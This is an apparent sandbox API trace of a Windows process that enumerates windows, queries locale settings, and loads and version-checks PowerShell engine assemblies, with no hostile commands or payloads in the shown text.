	[0630.573] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x778
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x460
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x558
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.573] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x4d0
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x2037c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1bb4
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x204d4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10bc
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x20376, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b50
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x108ba, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14b4
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x108b4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x149c
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x108ae, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14a8
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1490
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x14a4
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x148c
	[0630.574] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1458
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b4c
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1b3c
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10838, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x19bc
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10828, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x199c
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10824, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1998
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10820, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1994
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x1081c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1990
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10812, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1984
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x1080c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x197c
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x10808, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1978
	[0630.575] GetWindowThreadProcessId (in: hWnd=0x107e4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1824
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x107d0, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1088
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x107c4, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1908
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x107b6, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18cc
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x1079c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x18d0
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x10792, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1840
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10c4
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x128c
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16e8
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x16cc
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x274
	[0630.576] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10e0
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10cc
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10c0
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x10d0
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1198
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1080
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x1074
	[0630.577] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x16dda0 | out: lpdwProcessId=0x16dda0) returned 0x106c
	[0630.581] WerSetFlags () returned 0x0
	[0633.492] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0633.493] CoTaskMemFree (pv=0x0) 
	[0633.494] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e100 | out: pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x16e100) returned 1
	[0633.494] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x2c67608, pcchLanguagesBuffer=0x16e100 | out: pulNumLanguages=0x16e108, pwszLanguagesBuffer=0x2c67608, pcchLanguagesBuffer=0x16e100) returned 1
	[0633.500] CoTaskMemAlloc (cb=0x24) returned 0x2be4b0
	[0633.500] GetUserDefaultLocaleName (in: lpLocaleName=0x2be4b0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0633.501] CoTaskMemFree (pv=0x2be4b0) 
	[0633.531] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0633.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.531] CoTaskMemFree (pv=0x2b1df0) 
	[0633.534] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0633.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0633.534] CoTaskMemFree (pv=0x2b1df0) 
	[0635.568] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0635.568] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.568] CoTaskMemFree (pv=0x2b1df0) 
	[0635.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16dad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16db70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0635.580] SetErrorMode (uMode=0x1) returned 0x1
	[0635.580] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x16dd80 | out: lpFileInformation=0x16dd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0635.580] SetErrorMode (uMode=0x1) returned 0x1
	[0635.580] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x16dff0 | out: lpdwHandle=0x16dff0) returned 0x94c
	[0635.581] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c6ae98 | out: lpData=0x2c6ae98) returned 1
	[0635.583] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16df68, puLen=0x16df60 | out: lplpBuffer=0x16df68*=0x2c6af34, puLen=0x16df60) returned 1
	[0635.583] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b010, puLen=0x16ded0) returned 1
	[0635.583] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0635.583] CoTaskMemAlloc (cb=0x2e) returned 0x2c09b0
	[0635.583] lstrcpyW (in: lpString1=0x2c09b0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0635.583] CoTaskMemFree (pv=0x2c09b0) 
	[0635.583] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b064, puLen=0x16ded0) returned 1
	[0635.583] lstrlenW (lpString="System.Management.Automation") returned 28
	[0635.583] CoTaskMemAlloc (cb=0x3c) returned 0x2c8cd0
	[0635.583] lstrcpyW (in: lpString1=0x2c8cd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0635.583] CoTaskMemFree (pv=0x2c8cd0) 
	[0635.583] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b0c0, puLen=0x16ded0) returned 1
	[0635.583] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.583] CoTaskMemAlloc (cb=0x20) returned 0x2c5ae0
	[0635.583] lstrcpyW (in: lpString1=0x2c5ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.583] CoTaskMemFree (pv=0x2c5ae0) 
	[0635.583] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b100, puLen=0x16ded0) returned 1
	[0635.583] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.583] CoTaskMemAlloc (cb=0x44) returned 0x2c8cd0
	[0635.583] lstrcpyW (in: lpString1=0x2c8cd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.583] CoTaskMemFree (pv=0x2c8cd0) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b168, puLen=0x16ded0) returned 1
	[0635.584] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0635.584] CoTaskMemAlloc (cb=0x76) returned 0x25f940
	[0635.584] lstrcpyW (in: lpString1=0x25f940, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0635.584] CoTaskMemFree (pv=0x25f940) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b204, puLen=0x16ded0) returned 1
	[0635.584] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0635.584] CoTaskMemAlloc (cb=0x44) returned 0x2c8cd0
	[0635.584] lstrcpyW (in: lpString1=0x2c8cd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0635.584] CoTaskMemFree (pv=0x2c8cd0) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b268, puLen=0x16ded0) returned 1
	[0635.584] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0635.584] CoTaskMemAlloc (cb=0x58) returned 0x284740
	[0635.584] lstrcpyW (in: lpString1=0x284740, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0635.584] CoTaskMemFree (pv=0x284740) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6b2e4, puLen=0x16ded0) returned 1
	[0635.584] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0635.584] CoTaskMemAlloc (cb=0x20) returned 0x2c5ae0
	[0635.584] lstrcpyW (in: lpString1=0x2c5ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0635.584] CoTaskMemFree (pv=0x2c5ae0) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x2c6af8c, puLen=0x16ded0) returned 1
	[0635.584] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0635.584] CoTaskMemAlloc (cb=0x66) returned 0x2c4c50
	[0635.584] lstrcpyW (in: lpString1=0x2c4c50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0635.584] CoTaskMemFree (pv=0x2c4c50) 
	[0635.584] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0635.585] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0635.585] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x16ded8, puLen=0x16ded0 | out: lplpBuffer=0x16ded8*=0x0, puLen=0x16ded0) returned 0
	[0635.585] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x16dea8, puLen=0x16dea0 | out: lplpBuffer=0x16dea8*=0x2c6af34, puLen=0x16dea0) returned 1
	[0635.585] CoTaskMemAlloc (cb=0x204) returned 0x263c80
	[0635.585] VerLanguageNameW (in: wLang=0x0, szLang=0x263c80, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0635.585] CoTaskMemFree (pv=0x263c80) 
	[0635.585] VerQueryValueW (in: pBlock=0x2c6ae98, lpSubBlock="\\", lplpBuffer=0x16def8, puLen=0x16def0 | out: lplpBuffer=0x16def8*=0x2c6aec0, puLen=0x16def0) returned 1
	[0635.594] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0635.594] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.594] CoTaskMemFree (pv=0x2b1df0) 
	[0635.596] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0635.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0635.596] CoTaskMemFree (pv=0x2b1df0) 
	[0635.603] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ddc8 | out: phkResult=0x16ddc8*=0x2f4) returned 0x0
	[0635.605] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x16ddb8 | out: phkResult=0x16ddb8*=0x2f8) returned 0x0
	[0635.605] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16de48 | out: phkResult=0x16de48*=0x2fc) returned 0x0
	[0635.608] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd8c, lpData=0x0, lpcbData=0x16dd88*=0x0 | out: lpType=0x16dd8c*=0x1, lpData=0x0, lpcbData=0x16dd88*=0x56) returned 0x0
	[0635.609] CoTaskMemAlloc (cb=0x5a) returned 0x2c4be0
	[0635.609] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16dd5c, lpData=0x2c4be0, lpcbData=0x16dd58*=0x56 | out: lpType=0x16dd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16dd58*=0x56) returned 0x0
	[0637.352] CoTaskMemFree (pv=0x2c4be0) 
	[0637.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.367] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0637.385] CoTaskMemAlloc (cb=0x104) returned 0x2b1df0
	[0637.385] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1df0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0637.385] CoTaskMemFree (pv=0x2b1df0) 
	[0650.328] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0650.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0655.163] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0655.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.163] CoTaskMemFree (pv=0x2b1f00) 
	[0655.164] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0655.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.164] CoTaskMemFree (pv=0x2b1f00) 
	[0655.193] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0655.193] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.194] CoTaskMemFree (pv=0x2b1f00) 
	[0655.194] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0655.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.194] CoTaskMemFree (pv=0x2b1f00) 
	[0655.194] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0655.194] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0655.194] CoTaskMemFree (pv=0x2b1f00) 
	[0660.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0660.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0662.121] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0662.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.121] CoTaskMemFree (pv=0x2b1f00) 
	[0662.123] CoTaskMemAlloc (cb=0x104) returned 0x2b1f00
	[0662.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b1f00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0662.123] CoTaskMemFree (pv=0x2b1f00) 
	[0663.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0663.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0673.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0673.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0675.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0675.391] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16d980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
